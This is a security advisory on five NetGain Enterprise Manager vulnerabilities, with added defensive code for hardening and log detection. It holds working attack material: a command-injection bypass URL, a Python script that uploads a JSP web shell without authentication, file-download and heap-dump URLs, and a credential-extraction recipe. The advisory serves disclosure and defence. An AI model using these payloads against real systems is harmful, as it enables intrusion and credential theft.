
[R1] NetGain Enterprise Manager Multiple Remote Vulnerabilities

High

Synopsis

While researching a command injection vulnerability published on Exploit Database, Tenable found multiple remote vulnerabilities in NetGain Enterprise Manager.

CVE-2017-16608: Incomplete Command Injection Patch

NetGain tried to patch the Exploit-DB command injection vulnerability in 7.2.586 build 877. The patch prevented the command injection by adding the following logic:

  1. The argument parameter must be a valid IP address
  2. The command must start with "cmd /c ping" or "ping -c 5"

The obvious problem is that an attacker can append additional information after the required command text. For instance, an attacker could make a new directory by using the command argument "cmd /c ping || mkdir C:\Users\Public\fun ||". The following URL is a complete example:

http://[target]:8081/u/jsp/tools/exec.jsp?command=cmd%20%2Fc%20ping%20%7C%7C%20mkdir%20C%3A%5CUsers%5CPublic%5Cfun%20%7C%7C&argument=127.0.0.1&async_output=nessus_56043399
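As an added illustration (not NetGain's code and not part of the original advisory), the patch logic as the advisory describes it is reconstructed below in Python, which is an assumption about its implementation, beside a hardened check that accepts only an exact fixed command and returns an argv list so the IP argument is never interpreted by a shell:

```python
import ipaddress

# Reconstruction (assumption based on the advisory text, not NetGain's code) of the
# 7.2.586 build 877 patch: a prefix check on the command and an IP check on the argument.
ALLOWED_PREFIXES = ("cmd /c ping", "ping -c 5")


def patched_check_allows(command: str, argument: str) -> bool:
    """Return True if the incomplete patch would accept this request."""
    try:
        ipaddress.ip_address(argument)
    except ValueError:
        return False
    # A prefix check lets anything after the prefix through.
    return command.startswith(ALLOWED_PREFIXES)


# Hardened replacement: an exact-match allowlist of commands, each mapped to a
# fixed argv list. The shell ("cmd /c") is dropped entirely, so metacharacters in
# the request can never be interpreted.
COMMAND_TEMPLATES = {
    "cmd /c ping": ["ping"],          # Windows: run ping directly, no cmd.exe
    "ping -c 5": ["ping", "-c", "5"],  # Linux
}


def hardened_argv(command: str, argument: str):
    """Return the argv to execute, or None if the request must be rejected."""
    try:
        ip = ipaddress.ip_address(argument)
    except ValueError:
        return None
    argv = COMMAND_TEMPLATES.get(command.strip())
    if argv is None:
        return None
    # The validated IP is a separate argv element, not part of a command string.
    return argv + [str(ip)]


# The bypass string quoted in the advisory.
BYPASS = "cmd /c ping || mkdir C:\\Users\\Public\\fun ||"
```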

CVE-2017-16610: Unauthenticated JSP Upload and Execution

An unauthenticated remote attacker can upload arbitrary files to the remote server via an HTTP POST request to /u/jsp/backup/upload_save_do.jsp. This is particularly useful because NetGain EM has write access to the web root, which means that an attacker can upload a JSP web shell. The following proof of concept uploads a web shell to the JavaScript directory.

import requests
import sys
from requests_toolbelt.multipart.encoder import MultipartEncoder

if len(sys.argv) != 3:
    print('Usage: ./nsg_backup_upload.py <server_address> <port>')
    print('Example: python ./nsg_backup_upload.py 192.168.1.38 8081')
    sys.exit(0)

# JSP web shell: runs the "cmd" query parameter and echoes its output.
jsp_shell = (
    '<%@ page import=\"java.util.*,java.io.*\"%>\n'
    '<html><body>'
    '<form method=\"GET\" name=\"myform\" action=\"\">\n'
        '<input type=\"text\" name=\"cmd\">\n'
        '<input type=\"submit\" value=\"Send\">\n'
    '</form>\n'
    '<pre>\n'
    '<%\n'
        'if (request.getParameter(\"cmd\") != null) {\n'
            'out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<br>\");\n'
            'Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n'
            'OutputStream os = p.getOutputStream();\n'
            'InputStream in = p.getInputStream();\n'
            'DataInputStream dis = new DataInputStream(in);\n'
            'String disr = dis.readLine();\n'
            'while ( disr != null ) {\n'
                'out.println(disr);\n'
                'disr = dis.readLine();\n'
            '}\n'
        '}\n'
     '%>\n'
    '</pre></body></html>')

# The filename field traverses out of the backup directory into the web root's
# JavaScript directory, where the uploaded JSP is served and executed.
multipart_data = MultipartEncoder(
    fields={
        'file': ('../u/js/shell.jsp', jsp_shell, 'text/plain')
    })

# Unauthenticated POST to the upload endpoint.
response = requests.post(
    'http://' + sys.argv[1] + ':' + sys.argv[2] + '/u/jsp/backup/upload_save_do.jsp',
    data=multipart_data, headers={'Content-Type': multipart_data.content_type})
print('Upload response: %d' % response.status_code)

CVE-2017-16609: Unauthenticated File Download

An unauthenticated remote attacker can download any file on the remote server via an HTTP GET (or POST) request. The following URL will download C:\Windows\win.ini:

http://[target]:8081/u/jsp/common/download.jsp?filename=win.ini&srcDir=C:\Windows
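The following is an added example (not NetGain's code and not part of the original advisory) of how a download.jsp-style handler can keep accepting srcDir and filename parameters while confining every result to a fixed base directory; the base directory name is an assumption:

```python
import re
from pathlib import Path, PurePosixPath


def resolve_download(base_dir: str, src_dir: str, filename: str):
    """Hardened path resolution for a file-download handler.

    srcDir and filename remain caller-supplied, but filename must be a bare
    name and the final path must stay inside base_dir. Returns a Path, or
    None when the request must be rejected.
    """
    # filename must be a bare name: no separators, no traversal components.
    if not filename or filename in (".", "..") or re.search(r"[\\/]", filename):
        return None
    # Normalise Windows separators so the same checks hold on either platform,
    # then reject absolute paths, drive letters (e.g. C:\Windows) and ".." parts.
    src = PurePosixPath(src_dir.replace("\\", "/"))
    if src.is_absolute() or re.match(r"^[A-Za-z]:", str(src)) or ".." in src.parts:
        return None
    base = Path(base_dir).resolve()  # assumed base directory for downloads
    candidate = (base / str(src) / filename).resolve()
    # Defence in depth: the resolved path (symlinks included) must remain under base.
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    return candidate
```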

CVE-2017-16607: Unauthenticated Information Disclosure

NetGain EM allows an unauthenticated remote attacker to download all of the process's heap memory using the following URL:

http://[target]:8081/u/jsp/settings/heapdumps.jsp?dumpnow=1

The attacker can then search the memory for interesting information such as credentials. For example, Tenable found the admin username and password in a dump using the following method:

albinolobster@ubuntu:~$ strings ./heapdump_2017_03_07_15_48_34.bin | grep username=
username=admin&password=thisismypassword%21
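As an added example (not part of the original advisory), the request shapes described for the four web-facing issues above can be matched against web server access logs. The log lines below are constructed, and the assumption is a combined-format access log in front of the NetGain EM web interface:

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (assumption: combined log format); not real traffic.
SAMPLE_LOG = """\
10.1.2.3 - - [07/Mar/2017:15:40:01 +0000] "GET /u/jsp/tools/exec.jsp?command=cmd%20%2Fc%20ping&argument=127.0.0.1 HTTP/1.1" 200 512
10.1.2.3 - - [07/Mar/2017:15:41:09 +0000] "GET /u/jsp/tools/exec.jsp?command=cmd%20%2Fc%20ping%20%7C%7C%20mkdir%20C%3A%5Cfun%20%7C%7C&argument=127.0.0.1 HTTP/1.1" 200 512
10.1.2.3 - - [07/Mar/2017:15:42:30 +0000] "POST /u/jsp/backup/upload_save_do.jsp HTTP/1.1" 200 77
10.1.2.3 - - [07/Mar/2017:15:43:11 +0000] "GET /u/jsp/common/download.jsp?filename=win.ini&srcDir=C:\\Windows HTTP/1.1" 200 92
10.1.2.3 - - [07/Mar/2017:15:48:34 +0000] "GET /u/jsp/settings/heapdumps.jsp?dumpnow=1 HTTP/1.1" 200 41
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def classify(method: str, target: str):
    """Return the advisory CVE ids a single request matches (possibly several)."""
    parts = urlsplit(target)
    q = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    hits = []
    # exec.jsp: a ping prefix followed by shell metacharacters (the incomplete patch).
    if parts.path == "/u/jsp/tools/exec.jsp" and re.search(r"[|&;`$]", q.get("command", "")):
        hits.append("CVE-2017-16608")
    # upload_save_do.jsp: any unauthenticated upload is worth review.
    if parts.path == "/u/jsp/backup/upload_save_do.jsp" and method == "POST":
        hits.append("CVE-2017-16610")
    # download.jsp: srcDir pointing at an absolute path, drive letter or traversal.
    src = q.get("srcDir", "")
    if parts.path == "/u/jsp/common/download.jsp" and (
            ".." in src or re.match(r"^([A-Za-z]:|[\\/])", src)):
        hits.append("CVE-2017-16609")
    # heapdumps.jsp: an on-demand heap dump request.
    if parts.path == "/u/jsp/settings/heapdumps.jsp" and q.get("dumpnow") == "1":
        hits.append("CVE-2017-16607")
    return hits


def scan_log(text: str):
    """Yield (client ip, timestamp, cve) for every matching request in the log."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for cve in classify(m["method"], m["target"]):
            findings.append((m["ip"], m["ts"], cve))
    return findings
```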

CVE-2017-17406: Unsafe Java Object Deserialization

NetGain EM exposes a couple of Java RMI Registries on ports 1800 and 1850. Also, NetGain uses a few Java libraries that are known to be useful in Java deserialization attacks including bsh, Apache Commons Collections, and Apache Commons FileUpload. Tenable confirmed an unauthenticated remote attacker could achieve remote code execution using a deserialization attack over RMI.

Solution

Upgrade to NetGain Enterprise Manager 7.2.766 or later.

Disclosure Timeline

2017-03-08 - Issues discovered
2017-03-17 - Issues submitted to ZDI
2017-04-11 - ZDI accepts vulnerabilities
2017-12-13 - ZDI releases advisories
2018-01-30 - Tenable releases advisory

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2018-02
Credit: Jacob Baines
CVSSv2 Base / Temporal Score: 7.5 / 6.2
CVSSv2 Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Affected Products: NetGain Enterprise Manager version less than 7.2.766
Risk Factor: High
Additional Keywords: ZDI-17-949, ZDI-17-950, ZDI-17-951, ZDI-17-952, ZDI-17-953

Advisory Timeline

2018-01-30 - [R1] Initial Release
